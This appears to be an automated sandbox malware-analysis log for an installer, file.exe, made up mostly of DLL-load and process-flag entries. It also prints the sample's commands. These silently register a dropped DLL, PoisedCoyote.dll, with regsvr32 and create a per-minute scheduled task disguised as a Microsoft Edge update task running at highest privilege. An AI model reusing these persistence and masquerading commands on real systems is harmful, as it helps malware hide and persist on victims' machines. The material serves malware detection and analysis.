Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: pdh.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: propsys.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: netutils.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: samcli.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: perfos.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Little Leg_is1Jump to behavior
Source: file.exeStatic file information: File size 1769630 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB206890 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,16_2_00007FFDFB206890
Source: is-D8FFC.tmp.6.drStatic PE information: section name: .xdata
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B0BD2A5 pushad ; iretd 9_2_00007FFD9B0BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B1D792B push ebx; retf 9_2_00007FFD9B1D796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B0DD2A5 pushad ; iretd 14_2_00007FFD9B0DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B1FB042 push eax; ret 14_2_00007FFD9B1FB051
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpFile created: C:\Users\user\AppData\Local\is-DOVSB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpFile created: C:\Users\user\AppData\Roaming\is-D8FFC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpFile created: C:\Users\user\AppData\Roaming\PoisedCoyote.dll (copy)Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
